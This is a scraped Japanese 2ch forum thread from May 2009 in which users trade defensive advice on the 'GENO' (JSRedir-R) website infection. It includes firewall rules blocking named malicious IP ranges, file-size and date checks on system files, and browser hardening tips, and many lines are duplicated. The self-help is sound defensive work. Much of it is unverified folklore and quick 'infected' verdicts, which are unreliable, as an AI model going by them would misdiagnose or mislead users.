サイトには注意書きとwikiへのリンク貼っておいた
これ犯人見つかったらどれくらい罪重いんだろうな
>>277
繋がるし軽いよ
繋がるし軽いよ
291 :GENO:2009/05/17(日) 00:39:36 ID:O15VNW6S0
>>267
今までのから見てわかりやすさを求めるならば
現在新種のコンピュータウイルス通称GENOウイルス(正式名称:「JSRedir-R」)が急速に拡大中です。
の気もするけど、どうなんでしょうね?
文句言われるのかなー…?
上記がまずければ>>267でいいような気がする。せっかく(ってのも何だけど)正式名称あるなら。
今までのから見てわかりやすさを求めるならば
現在新種のコンピュータウイルス通称GENOウイルス(正式名称:「JSRedir-R」)が急速に拡大中です。
の気もするけど、どうなんでしょうね?
文句言われるのかなー…?
上記がまずければ>>267でいいような気がする。せっかく(ってのも何だけど)正式名称あるなら。
292 :GENO:2009/05/17(日) 00:39:36 ID:Co0JIJet0
fc2は繋がるようになった。
さっきのはなんだったんだろう。
ところでkingsoftての使ってる人はいる?
さっきのはなんだったんだろう。
ところでkingsoftての使ってる人はいる?
ウイルス関係以外で雑談やめれ
感情論とか今どうでもいい
感情論とか今どうでもいい
なあ、○○が見れない系の関係ない報告はやめないか?
詳しくない奴が見たら混乱するだろ。
http経由のファイルアップしかできない動画サイトやPIXIVを危ぶむ意味がわからん。運営が感染してるとかならわかるが。
wikiは大丈夫かとか携帯やPSPはとか…とか言っちゃうような奴はまず落ち着け。
怖いと感じるのは、対象への理解が足りないから怖いんだと思う。
ちゃんとwiki読めば仕組みがなんとなく分かると思うんだ。
詳しくない奴が見たら混乱するだろ。
http経由のファイルアップしかできない動画サイトやPIXIVを危ぶむ意味がわからん。運営が感染してるとかならわかるが。
wikiは大丈夫かとか携帯やPSPはとか…とか言っちゃうような奴はまず落ち着け。
怖いと感じるのは、対象への理解が足りないから怖いんだと思う。
ちゃんとwiki読めば仕組みがなんとなく分かると思うんだ。
ふたばが感染したってガセ?
>>296
ガセと言われてたが詳細不明
ガセと言われてたが詳細不明
>>279
まさしく豚に真珠だな
まさしく豚に真珠だな
299 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:42:11 ID:tznnOLLq0
これあんまりググらない方がいいってのはなんで?
症状の一つに感染者がググると改竄リンクが出るってのはわかるけど
グーグル自体に問題でもあるの?
症状の一つに感染者がググると改竄リンクが出るってのはわかるけど
グーグル自体に問題でもあるの?
>>298
意味がわからない
意味がわからない
初心者版は欲しいな
対策とかの言葉で一部分からないところあるし
対策とかの言葉で一部分からないところあるし
>>247
出来る限り対処したいんだけど、じゃあその他何すればいいの?
出来る限り対処したいんだけど、じゃあその他何すればいいの?
>>220
JAVAアプレット開始…のメッセージでカスペスキャン出来ないんだけど
スキャンする時だけavastもファイアーウォールも切ってある
セキュリティレベル下げてJSもオンにしてるけど駄目なんだ…
もちろんJAVAアプレットは切ってない
JAVAアプレット開始…のメッセージでカスペスキャン出来ないんだけど
スキャンする時だけavastもファイアーウォールも切ってある
セキュリティレベル下げてJSもオンにしてるけど駄目なんだ…
もちろんJAVAアプレットは切ってない
>1のチェックして無駄だと思いつつもノートン先生でフルスキャンした
何も出なかったけど安心できないので今カスペのオンラインやってるんだが
1時間たってもまだ7%とか…
何も出なかったけど安心できないので今カスペのオンラインやってるんだが
1時間たってもまだ7%とか…
>>303
「じゃあ」で訊いて教えてもらえると思うな
「じゃあ」で訊いて教えてもらえると思うな
pixiv運営のついったー
# pixivが重い。。24分前 webで
# 対応中です。23分前 webで
# pixivが激しく重いので対応中です。19分前 webで
# 対応しました!3分前 webで
# ご迷惑をおかけしました!!20秒以内前 webで
ヒヤヒヤさせやがって・・・www
# pixivが重い。。24分前 webで
# 対応中です。23分前 webで
# pixivが激しく重いので対応中です。19分前 webで
# 対応しました!3分前 webで
# ご迷惑をおかけしました!!20秒以内前 webで
ヒヤヒヤさせやがって・・・www
308 :GENO:2009/05/17(日) 00:44:02 ID:k/dYf2fw0
>>3 >>267
や、削る必要があるとするなら「個別」の 95.129.145.58 なんだけど
(「範囲」の方でカバーできてるから)
どこでどう情報が錯綜してるかワカンネから、自信がなければそのままでもいいとオモ。
さっきも書きましたが、普通に書かれてる順番で打ち込んでいけば
ノートン先生が注意してくれるので、大きな混乱にはならないはず。
や、削る必要があるとするなら「個別」の 95.129.145.58 なんだけど
(「範囲」の方でカバーできてるから)
どこでどう情報が錯綜してるかワカンネから、自信がなければそのままでもいいとオモ。
さっきも書きましたが、普通に書かれてる順番で打ち込んでいけば
ノートン先生が注意してくれるので、大きな混乱にはならないはず。
309 :GD:2009/05/17(日) 00:44:04 ID:ueGxpPuI0
とりあえず正常ファイル
sqlsodbc.chm
MD5:f639afde02547603a3d3930ee4bf8c12
sqlsodbc.chm
MD5:f639afde02547603a3d3930ee4bf8c12
>>299
>3
>3
同人以外の個人サイトは、感染して無反応とか
何度も感染繰り返すようだとURL晒されてるね。
同人だけは特別って認識はどこから来てるんだろう。
何度も感染繰り返すようだとURL晒されてるね。
同人だけは特別って認識はどこから来てるんだろう。
>>287
案の定125を見落としていましたスマソ
それで書き換えてきます
>>277
現時点では自分のPC含めおかしいところは見当たらないようだ
今ちょこちょこ書き換えたり削ったりしてるからかもしれん(わからんが)
ずっと続くようならまた報告してください
(293まで確認)
案の定125を見落としていましたスマソ
それで書き換えてきます
>>277
現時点では自分のPC含めおかしいところは見当たらないようだ
今ちょこちょこ書き換えたり削ったりしてるからかもしれん(わからんが)
ずっと続くようならまた報告してください
(293まで確認)
>>299
ググッた先のサイトが感染済みの可能性も高いから
ググッた先のサイトが感染済みの可能性も高いから
314 :GENO:2009/05/17(日) 00:44:51 ID:8yHdaheX0
315 :geno:2009/05/17(日) 00:45:36 ID:SK1PylRj0
>>276
できたっぽい。ありがとう!
できたっぽい。ありがとう!
321 :GENO:2009/05/17(日) 00:47:08 ID:FnPZ+X/U0
自PCからちょっと安心してネサフしたい窓ユーザはデュアルブートで
linuxでも入れたらいい。タダだし
>>3
まとめ乙です
ブリーチ(週間ジャンプ)と十二国記(小説)で個人サイトの
感染確認しました
linuxでも入れたらいい。タダだし
>>3
まとめ乙です
ブリーチ(週間ジャンプ)と十二国記(小説)で個人サイトの
感染確認しました
>>311
それでも隠蔽したいんだろう
それでも隠蔽したいんだろう
久しぶりにiBook起動してネットやろうかな
>>311
そりゃわざわざサイトを検索にひっかからないようにするようなジャンル性だからだろ
そりゃわざわざサイトを検索にひっかからないようにするようなジャンル性だからだろ
おっと書き込めた当方マカ
Macスレで出てたの投下します
--------ここから----------
10.3までのOSユーザーはFlash Playerを外すか・Acrobatリーダーの
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
TigerとLeopardの人はAcrobatは9.1、Flash Playerは10.0.22.87以上に更新する
またAcrobat Readerの初期設定からAcrobat JavaScriptをオフにする
(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
Firefox使ってる人は3.0.10に更新してNoScript入れること
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置いて
リンク先が不正URLでないか確認した上で「一時的に許可」すること
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できます
(OmniWebだけのシャットダウン、Safariには影響しません)
自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
BootCampでXPを入れている人は
C:%uC2A5WINDOWS%uC2A5system32%uC2A5sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
-----------ここまで-----------
ClamXavも頻繁にアップデートされてるので要チェック
Macスレで出てたの投下します
--------ここから----------
10.3までのOSユーザーはFlash Playerを外すか・Acrobatリーダーの
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
TigerとLeopardの人はAcrobatは9.1、Flash Playerは10.0.22.87以上に更新する
またAcrobat Readerの初期設定からAcrobat JavaScriptをオフにする
(AcrobatReaderは「プレビュー.app」で代用可能なので始めから入れない手もある)
Firefox使ってる人は3.0.10に更新してNoScript入れること
非表示状態になったFlashコンテンツをどうしても見たいときはマウスポインタを置いて
リンク先が不正URLでないか確認した上で「一時的に許可」すること
OmniWebなら初期設定→プラグインでFlashプラグインの活動を停止できます
(OmniWebだけのシャットダウン、Safariには影響しません)
自分のサイトが汚染されていないかソースを見て確認すること、FTPパスを変更すること
BootCampでXPを入れている人は
C:%uC2A5WINDOWS%uC2A5system32%uC2A5sqlsodbc.chm このサイズ表示(ディスク上のサイズではない)
50,727 bytes以外の数値に改ざんされていないかチェックすること。
-----------ここまで-----------
ClamXavも頻繁にアップデートされてるので要チェック
これは取り敢えず感染してなかったらジッとしてるでOKなんだよな
皆、自サイトに注意書きしてる?
■ファイアーウォール
ノートン・バスターだったら
「ヘルプ」開いて「ファイアーウォール」か「ファイアウォール」をキーワード検索
「追加」とか「新規」みたいな項目を参照してみるといい
これでだいたい情報が出るはず
あとは>>3のwikiで既出のノートンの設定方法を参考にしながら設定
見ればわかると思う
見てわからないなら、公式のアップデートを待つ方が安全
ノートン・バスターだったら
「ヘルプ」開いて「ファイアーウォール」か「ファイアウォール」をキーワード検索
「追加」とか「新規」みたいな項目を参照してみるといい
これでだいたい情報が出るはず
あとは>>3のwikiで既出のノートンの設定方法を参考にしながら設定
見ればわかると思う
見てわからないなら、公式のアップデートを待つ方が安全
>>274
6:うちのとインターフェースが違うくてやりかたがわからない
6:うちのとインターフェースが違うくてやりかたがわからない
>>317
それもしかしたら「感染報告有りの『ジャンルの』女性向け個人サイト」じゃないか
それもしかしたら「感染報告有りの『ジャンルの』女性向け個人サイト」じゃないか
なんだ、またディアボロモンが出てきたか・・・
助けてオメガモン
助けてオメガモン
335 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:50:56 ID:819QNNdt0
腐女子叩きしてる奴ずっと同じだなw
>>330
PCの電源を落として、外で元気よく遊ぶって対処はどう?
PCの電源を落として、外で元気よく遊ぶって対処はどう?
理屈としては、2ヶ月くらいまったく更新してないサイトは
踏んでも感染の危険はないってことになるのか?
踏んでも感染の危険はないってことになるのか?
ブログで注意喚起の記事かこうと思ってるんだけど上手くかけん
勘違いさせて申し訳ないです
感染報告のあったジャンルで、まだ感染はしていない個人サイトの管理人です
自衛策についてって入れ忘れてました
本当すみません
もし感染してたらwikiやアドバイス通りOS再インスコしてみます
感染報告のあったジャンルで、まだ感染はしていない個人サイトの管理人です
自衛策についてって入れ忘れてました
本当すみません
もし感染してたらwikiやアドバイス通りOS再インスコしてみます
343 :GENO:2009/05/17(日) 00:52:17 ID:GhtL9Szf0
345 :GENO:2009/05/17(日) 00:53:01 ID:lOQh6FbQ0
>>283,304
オンラインスキャンできないってのはソースチェッカーみたいにアクセス過多とは考えられんかね?
普段アンチウイルス入れないでオンラインスキャンやってるから大丈夫ってタコもいるわけだし。
過剰に騒いでる感もあるから今日はとりあえず寝るってのもありだよ。
回線と電源切って繋いで来る魔法使いなんかいないんだからさ。
オンラインスキャンできないってのはソースチェッカーみたいにアクセス過多とは考えられんかね?
普段アンチウイルス入れないでオンラインスキャンやってるから大丈夫ってタコもいるわけだし。
過剰に騒いでる感もあるから今日はとりあえず寝るってのもありだよ。
回線と電源切って繋いで来る魔法使いなんかいないんだからさ。
>>3
まとめサイトの「よくある質問」の「携帯閲覧は平気?」の項目ですが、
あの書き方だとフルブラウザの携帯では感染するように読めてしまいます。
フルブラウザでも現状携帯は感染しないようですので、
『携帯電話でサイトを閲覧しても、現状では感染しない』
というように書き換えてくださるとありがたいです。
まとめサイトの「よくある質問」の「携帯閲覧は平気?」の項目ですが、
あの書き方だとフルブラウザの携帯では感染するように読めてしまいます。
フルブラウザでも現状携帯は感染しないようですので、
『携帯電話でサイトを閲覧しても、現状では感染しない』
というように書き換えてくださるとありがたいです。
>>329
字サイトで注意書き、まとめさいとにリンク済み。
はじめの方は注意書きすると「ねらーだったんですか」とかコメ送ってくるような輩もいたらしいけど
今はジャンルサーチやpixivでも注意書き広まってる
サイトでも注意書きすべき
字サイトで注意書き、まとめさいとにリンク済み。
はじめの方は注意書きすると「ねらーだったんですか」とかコメ送ってくるような輩もいたらしいけど
今はジャンルサーチやpixivでも注意書き広まってる
サイトでも注意書きすべき
ゲイの腐女子叩きは異常
携帯だとFTP自体使うこともないし
フルブラウザ使って万が一ウィルス感染したとしても
元々のウィルスの生体環境と合ってないから、結果感染はあってないようなもの
という解釈でおK?
ウィルスわかんねーよ難しーよ
フルブラウザ使って万が一ウィルス感染したとしても
元々のウィルスの生体環境と合ってないから、結果感染はあってないようなもの
という解釈でおK?
ウィルスわかんねーよ難しーよ
そういや使ってないから確定情報ではないけど
フレッツウイルスクリアver4=バスター2009だから(ver3が2008)
そっちでも検疫できるんじゃないかと思う
v6と西のツールはわからん
フレッツウイルスクリアver4=バスター2009だから(ver3が2008)
そっちでも検疫できるんじゃないかと思う
v6と西のツールはわからん
354 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:54:37 ID:ioh/dIlm0
これ、改ざんされるのってhtmlファイルだけ?
感染したらしいが、特にサイトのソースに変化なかったみたいだった
(全消し&パス替え&クリーンインスコはもうしましたorz)
うちのサイトは全部phpファイルだったんだが、
別にそんなこと関係ないよな……
そぼくな疑問というか、どうでもいい疑問ですまん
感染したらしいが、特にサイトのソースに変化なかったみたいだった
(全消し&パス替え&クリーンインスコはもうしましたorz)
うちのサイトは全部phpファイルだったんだが、
別にそんなこと関係ないよな……
そぼくな疑問というか、どうでもいい疑問ですまん
356 :geno:2009/05/17(日) 00:55:01 ID:/3OwKYN30
字→自でした
テンパってすまんね
テンパってすまんね
>>338
自サイトとPCが感染していない事を確認後
ブログに「関連スレ・まとめWikiからの抜粋です」って記事書いて
更に追記に、分かり易く平たくまとめたものを置いといた
特に閲からの反応はない
でも普段のホトは多い方なので、効果が少しでもあればいいと思ってる
自サイトとPCが感染していない事を確認後
ブログに「関連スレ・まとめWikiからの抜粋です」って記事書いて
更に追記に、分かり易く平たくまとめたものを置いといた
特に閲からの反応はない
でも普段のホトは多い方なので、効果が少しでもあればいいと思ってる
ブログにウイルスのこと書いたら土曜だけでもアクセス凄いことになってたわ。
悲しいことに同ジャンルの人は見てくれてないこと。
記事かけない人はトラバ自由だから引用とかつかってもらってもいいんだけど、
アドレス晒すのあれだしなぁ。
悲しいことに同ジャンルの人は見てくれてないこと。
記事かけない人はトラバ自由だから引用とかつかってもらってもいいんだけど、
アドレス晒すのあれだしなぁ。
>>329
3ホタだけど注意書きしてまとめのリンク貼った
3ホタだけど注意書きしてまとめのリンク貼った
363 :GENO:2009/05/17(日) 00:56:17 ID:7o2dtJkl0
>337
その管理人が別サイトでFTP使ってたらアウトだろ
その管理人が別サイトでFTP使ってたらアウトだろ
>>292
自分も使ってる
自分も使ってる
まさにネット界のパンデミックだな
これって今までのウイルス騒動の中でもどれくらいのやばさに該当する?
DBか政治で例えてくれ
これって今までのウイルス騒動の中でもどれくらいのやばさに該当する?
DBか政治で例えてくれ
レスどうも
簡単に書いておくことにするよありがとう
簡単に書いておくことにするよありがとう
369 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:56:48 ID:tznnOLLq0
>>329
トップページで注意喚起した
付き合いのあるサイト管理人さんにも連絡した
すぐに呼応してブログやサイトトップに告知出してくれる管理人さんもいるし、
大げさだって言う管理人さんもいた
大げさだって笑われたっていいんだ
問題起きてからじゃ遅いんだから
トップページで注意喚起した
付き合いのあるサイト管理人さんにも連絡した
すぐに呼応してブログやサイトトップに告知出してくれる管理人さんもいるし、
大げさだって言う管理人さんもいた
大げさだって笑われたっていいんだ
問題起きてからじゃ遅いんだから
まとめサイトのURLぶっこみスキャン、ブログのアドレス入れたら
ずっとStillなんたらって出る
混んでんのかなあ
ブログはほぼ感染しないって思ってていいんだろうか?
注意喚起文のせたいんだが、まずスキャンを、と思ったら時間かかって…
ずっとStillなんたらって出る
混んでんのかなあ
ブログはほぼ感染しないって思ってていいんだろうか?
注意喚起文のせたいんだが、まずスキャンを、と思ったら時間かかって…
372 :geno:2009/05/17(日) 00:57:39 ID:HhGbn2rD0
>>329
どピコだけどうちは書いてるよ。
今のところ読んでくれたのは1人だけだけど、IE8でのアクセスが増えてきた。
ジャンルサーチでも対応が速いところは注意書きがでてるけど、
そこや2ch見ない人もいるだろうから注意喚起のために書いた方がいいと思う。
できればまとめサイトへのリンクも載せるとよりよいかな。
どピコだけどうちは書いてるよ。
今のところ読んでくれたのは1人だけだけど、IE8でのアクセスが増えてきた。
ジャンルサーチでも対応が速いところは注意書きがでてるけど、
そこや2ch見ない人もいるだろうから注意喚起のために書いた方がいいと思う。
できればまとめサイトへのリンクも載せるとよりよいかな。
>>321入れました
>>308
「個別」の95.129.145.58は追加しなくていいって解釈でいんだよね
大丈夫だろうけど一応修正しとくノシ
名称についてはとりあえず>>267で様子見ということにします
意見あれば随時どうぞ
>>348今からやってきます
(345まで確認)
>>308
「個別」の95.129.145.58は追加しなくていいって解釈でいんだよね
大丈夫だろうけど一応修正しとくノシ
名称についてはとりあえず>>267で様子見ということにします
意見あれば随時どうぞ
>>348今からやってきます
(345まで確認)
>>329
昨夜からしてる
が、半数は2秒もせず目的コンテンツへ移動してる
登録してる幸管にもそれぞれメールしたんだけど何の反応もない
>>344
BootCamp使えないPPCユーザだから起動しない=おkかはわからん
とりあえずSentryでアプリケーション・ライブラリ・ダウンロードを全部監視させてるよ
昨夜からしてる
が、半数は2秒もせず目的コンテンツへ移動してる
登録してる幸管にもそれぞれメールしたんだけど何の反応もない
>>344
BootCamp使えないPPCユーザだから起動しない=おkかはわからん
とりあえずSentryでアプリケーション・ライブラリ・ダウンロードを全部監視させてるよ
376 :GENO:2009/05/17(日) 00:59:18 ID:RRFJEuD+O
>>365
見た目イメージで人造人間吸収したあとのセル
見た目イメージで人造人間吸収したあとのセル
今sqlsodbc.chmのファイルサイズ見てきたんだが
46,133バイトはアウト?他のcmd.exeとregedit.exeは起動したし
ニフティでも何も引っかからなかったんだが…
ぶっ飛んだこと聞いてたら申し訳ない
46,133バイトはアウト?他のcmd.exeとregedit.exeは起動したし
ニフティでも何も引っかからなかったんだが…
ぶっ飛んだこと聞いてたら申し訳ない
379 :GENO:2009/05/17(日) 00:59:49 ID:3XFeCvnJO
>>355
phpでも書き換えられちゃうんじゃなかったっけ
phpでも書き換えられちゃうんじゃなかったっけ
pixivに注意喚起画像上げたもんですが、
「企画目録タグつけてイメレス募集した方がいい」とアドバイスが
あったのでやってみました。参加してくださる方がいると
ウイルスに対する認知度上がるのでありがたいです。
「企画目録タグつけてイメレス募集した方がいい」とアドバイスが
あったのでやってみました。参加してくださる方がいると
ウイルスに対する認知度上がるのでありがたいです。
381 :GENO:2009/05/17(日) 00:59:59 ID:C9Hc9U/u0
382 :geno:2009/05/17(日) 01:00:13 ID:Il+SPzcZO
>>365
セルとフリーザによる同時侵攻
セルとフリーザによる同時侵攻
>>287
未確認情報を追加するのは感心しない。
「分かっている限りでは」と前置きし、
末尾に「詳しいことは解析中であるため、
他にも被害をもたらす動きをしている可能性もあります」
とするのが無難だと思う。
未確認情報を追加するのは感心しない。
「分かっている限りでは」と前置きし、
末尾に「詳しいことは解析中であるため、
他にも被害をもたらす動きをしている可能性もあります」
とするのが無難だと思う。
385 :GENO:2009/05/17(日) 01:00:48 ID:/BtRfzOz0
386 :GENO:2009/05/17(日) 01:01:34 ID:XSgOllGY0
>>48とほぼ同じ状態なんだけど、firefox入れた直後に
adobeのサイト行ってflash入れた。
アドオンで見るとバージョンが10.0 r22と書かれてるんだがこれでいいのかな?
もし更新すべきならどうすればいいの?無効化と有効化しかボタンがない……
それから、ウイルスバスター2009のファイアーウォール設定で
IPを遮断する方法をご存知の方いませんか?
adobeのサイト行ってflash入れた。
アドオンで見るとバージョンが10.0 r22と書かれてるんだがこれでいいのかな?
もし更新すべきならどうすればいいの?無効化と有効化しかボタンがない……
それから、ウイルスバスター2009のファイアーウォール設定で
IPを遮断する方法をご存知の方いませんか?
>355
>363
トン。理解できてきた。
別にサイトを持ってるということも大いに有り得るからな。
更新の有る無しに関わらずソース確認必須か
>363
トン。理解できてきた。
別にサイトを持ってるということも大いに有り得るからな。
更新の有る無しに関わらずソース確認必須か
388 :GENO:2009/05/17(日) 01:01:58 ID:Oq4bXr9IO
ニューソクにスレたってなかっか?
+じゃないけど
+じゃないけど
需要有る無しというより、どっか間違ってないか確認お願いしたいので、バスターでのFW設定書いておく。
前スレノートン先生設定参照&引用改造
■ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
1.メイン画面→「パーソナルファイアウォール」クリック
2.「設定」クリック→開いたウィンドウ内の「詳細設定」クリック
3.「プロファイルの詳細設定」ウィンドウの「例外ルール(プロトコル)」タブをクリック
4.「追加」→「新規例外ルール(パーソナルファイアウォールネットワーク)」ウィンドウが開くので以下設定※
5.「OK」をクリックして開いているウィンドウを閉じ、最後にメイン画面を閉じる
※例外ルール設定について(IPの記述方法)
例1)【94.247.2.0 - 94.247.3.255】の場合
「説明」→例外ルール名を入力
「方向」→受信(送信でも同じ設定を作る)
「処理」→遮断
「プロトコル」→すべて
「ポート」→すべてのポート
「タイプ」→指定範囲のIPアドレス(IPv4)
→開始アドレスに「94.247.2.0」
→終了アドレスに「94.247.3.255」を入力
「OK]をクリック後、ルール名を変えて「方向:送信」で同様の設定を作成する
例2)【78.109.29.112】の場合(基本↑と同じ)
「タイプ」→IPアドレス(IPv4)
→ホスト名:空欄
→IPアドレスに「78.109.29.112」を入力
こんな感じであってる?
IPv6とかが正直ワカンネ
前スレノートン先生設定参照&引用改造
■ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
1.メイン画面→「パーソナルファイアウォール」クリック
2.「設定」クリック→開いたウィンドウ内の「詳細設定」クリック
3.「プロファイルの詳細設定」ウィンドウの「例外ルール(プロトコル)」タブをクリック
4.「追加」→「新規例外ルール(パーソナルファイアウォールネットワーク)」ウィンドウが開くので以下設定※
5.「OK」をクリックして開いているウィンドウを閉じ、最後にメイン画面を閉じる
※例外ルール設定について(IPの記述方法)
例1)【94.247.2.0 - 94.247.3.255】の場合
「説明」→例外ルール名を入力
「方向」→受信(送信でも同じ設定を作る)
「処理」→遮断
「プロトコル」→すべて
「ポート」→すべてのポート
「タイプ」→指定範囲のIPアドレス(IPv4)
→開始アドレスに「94.247.2.0」
→終了アドレスに「94.247.3.255」を入力
「OK]をクリック後、ルール名を変えて「方向:送信」で同様の設定を作成する
例2)【78.109.29.112】の場合(基本↑と同じ)
「タイプ」→IPアドレス(IPv4)
→ホスト名:空欄
→IPアドレスに「78.109.29.112」を入力
こんな感じであってる?
IPv6とかが正直ワカンネ
FTPのパスを変える
買い物とかした所のパスを変える
こえをしようとおもったら自分の環境だと一度ログインして
変更しないとダメなんだけど、リカバリした後だとログインしても
大丈夫なんだよね?ウイルス消えてる(はず)だから・・・
買い物とかした所のパスを変える
こえをしようとおもったら自分の環境だと一度ログインして
変更しないとダメなんだけど、リカバリした後だとログインしても
大丈夫なんだよね?ウイルス消えてる(はず)だから・・・
ところでjugemとかFC2のレンタルブログはダイジョウブなのか?
やばいって言ってる人が居たりして混乱してきた
やばいって言ってる人が居たりして混乱してきた
392 :geno:2009/05/17(日) 01:02:19 ID:dE8HKbzcO
>>368
流れこんなに早いのに書いてるやつは大体一緒ってことか
流れこんなに早いのに書いてるやつは大体一緒ってことか
>>365
ドラゴンボールを敵に7つ全部回収されてるぐらいやばい
>>370
どこかのニュースで見たけど、日本人って大災害・大震災の時
パニックになるよりも「大丈夫だろう」と事態を甘く見て
危険に陥ることの方が多いらしい
ドラゴンボールを敵に7つ全部回収されてるぐらいやばい
>>370
どこかのニュースで見たけど、日本人って大災害・大震災の時
パニックになるよりも「大丈夫だろう」と事態を甘く見て
危険に陥ることの方が多いらしい
>>347
うちもアウトかな・・・
同じようにkernel32.dllが3/21の23:07:24に更新されてる
sqlsodbc.chmは普通に2004年だ
カスペオンラインも出来ないので体験版落としてみる
うちもアウトかな・・・
同じようにkernel32.dllが3/21の23:07:24に更新されてる
sqlsodbc.chmは普通に2004年だ
カスペオンラインも出来ないので体験版落としてみる
>>373
>「個別」の95.129.145.58は追加しなくていいって解釈
そうですそうです。
どの道、wikiに書かれた順番通りに打ち込んでいけば
このアドレスはノートン先生に注意されて追加できません。
>「個別」の95.129.145.58は追加しなくていいって解釈
そうですそうです。
どの道、wikiに書かれた順番通りに打ち込んでいけば
このアドレスはノートン先生に注意されて追加できません。
396 :geno:2009/05/17(日) 01:03:12 ID:iPJ/ImKb0
うはwwwwwwwヤンキードゥードゥルウイルスに感染してたw
最大幸が注意書きしてくれて良かった
まだ感染してないが今使ってないPCサイトは削除、携帯サイトは暫くはPCアク禁、更新は携帯にすべきだよな
注意書きつけて
まだ感染してないが今使ってないPCサイトは削除、携帯サイトは暫くはPCアク禁、更新は携帯にすべきだよな
注意書きつけて
kernel32.dll のMD5を調べてみようよ
ごめん書き忘れてた
バスター設定についてはサポート参照
tp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
バスター設定についてはサポート参照
tp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
401 :GENO:2009/05/17(日) 01:04:25 ID:nHdsO1GP0
とりあえず確認事項は全部クリアして、ニフティのスキャンでも問題なしだったのだが
じゃあ今月始めごろからのメモリの異常消費&IE激重ですぐ固まる問題は
何が原因だったんだろう。やっぱり感染してるんじゃないかと怖い。
じゃあ今月始めごろからのメモリの異常消費&IE激重ですぐ固まる問題は
何が原因だったんだろう。やっぱり感染してるんじゃないかと怖い。
>>396
なんだその楽しそうな名前
なんだその楽しそうな名前
403 :GENO:2009/05/17(日) 01:04:35 ID:lOQh6FbQ0
3月21日に書き換えられてるって報告が多いね
ただの偽装なのかその辺でばら撒かれたのか
ただの偽装なのかその辺でばら撒かれたのか
>327訂正加筆
10.3までのOSユーザーはFlash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
Safari・OmniWebなどWebKitベースブラウザユーザーは「ダウンロードしたファイルを開く」を
オフにすること(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを
有効にする」および「プラグインを有効にする」も切っておくこと。
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
10.3までのOSユーザーはFlash Playerを外す
Acrobat ReaderおよびPDFの拡張子割り当て機能を外す
Safari・OmniWebなどWebKitベースブラウザユーザーは「ダウンロードしたファイルを開く」を
オフにすること(Safariの「全般」で設定できるが見落とされてしまうことが多い)
Safariの「開発」でJavaScriptをオフにした場合でも、設定→セキュリティ→「JavaScriptを
有効にする」および「プラグインを有効にする」も切っておくこと。
Webブラウザ内閲覧機能を切るかJavaScriptオフにする
406 :geno:2009/05/17(日) 01:04:51 ID:1aBsreVw0
>>388
ついさっき1000いった。
ついさっき1000いった。
407 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 01:04:57 ID:RBgr+byX0
ベリーナイスジャンキーのことかと思った
ブラウザのJavaScript切ってたら
ヤフメが中に入れてくれないorz
なんかscript使ってたっけあそこ
いちいちヤフメ開くときだけオンにするのうぜー
ヤフメが中に入れてくれないorz
なんかscript使ってたっけあそこ
いちいちヤフメ開くときだけオンにするのうぜー
412 :GENO:2009/05/17(日) 01:05:59 ID:4W1dycX4O
>>385
ようするに人間がインフルエンザでわーわーいってる間、
地球に潜伏してる宇宙人は体の内部構造が違うから風邪すらひかないってことか
ただウィルスが宇宙人にあわせて変化する可能性はあるから注意だけはしろよと
という解釈であってる?
ようするに人間がインフルエンザでわーわーいってる間、
地球に潜伏してる宇宙人は体の内部構造が違うから風邪すらひかないってことか
ただウィルスが宇宙人にあわせて変化する可能性はあるから注意だけはしろよと
という解釈であってる?
413 :げの:2009/05/17(日) 01:05:59 ID:+NzM6x/EO
414 :GENO:2009/05/17(日) 01:06:04 ID:Ee2VdHkT0
>>407
アドオン追加しなくてもJS切っとけばOKのはず
アドオン追加しなくてもJS切っとけばOKのはず
>>394
こっちもカーネル32同じ時間に更新されてるな
こっちもカーネル32同じ時間に更新されてるな
Yahooトップページは大丈夫だよね?
kernel32.dllが2009年3月21日23:18:57になってるんだがアウトか?
サイト消してくるか
サイト消してくるか
419 :GENO:2009/05/17(日) 01:06:16 ID:txLmXpE00
ソースに埋め込まれるスクリプトって全ページ一律に埋め込まれるんだろうか
自分のPCは感染していないけど念には念を、と思って自サイトのソースを見だしたんだが
ファイル数が多くて挫折した_| ̄|○
今んとこアウトだったらトップから丸ごとアウトな報告ばかりだよな?
自分のPCは感染していないけど念には念を、と思って自サイトのソースを見だしたんだが
ファイル数が多くて挫折した_| ̄|○
今んとこアウトだったらトップから丸ごとアウトな報告ばかりだよな?
420 :geno:2009/05/17(日) 01:06:21 ID:/3OwKYN30
>>418
アウト
アウト
そろそろ散々馬鹿にしてくれたピクシブスレの奴らが乗り込んでくるなあ…
423 :GENO:2009/05/17(日) 01:08:24 ID:C9Hc9U/u0
424 :GENO:2009/05/17(日) 01:09:14 ID:Co0JIJet0
>>364
仲間がいてなんだかほっとしたw
あれってどうなんだろうね。ちゃんと報告してくれるんだろうか。
今のところ何も言ってこない…(あまりネサフしてない、というのもあるのかもだけど)
今、サイトにウィルスに対する注意とまとめへのリンク貼ってきた。
しっかしjs切ると不便だな。やほーメールも使えない。読むことは出来るんだが
アドレスブックが表示されない…
仲間がいてなんだかほっとしたw
あれってどうなんだろうね。ちゃんと報告してくれるんだろうか。
今のところ何も言ってこない…(あまりネサフしてない、というのもあるのかもだけど)
今、サイトにウィルスに対する注意とまとめへのリンク貼ってきた。
しっかしjs切ると不便だな。やほーメールも使えない。読むことは出来るんだが
アドレスブックが表示されない…
サーパラあたり注意喚起してほしい
>>373
更新乙
携帯の件に限らずなんだけど、
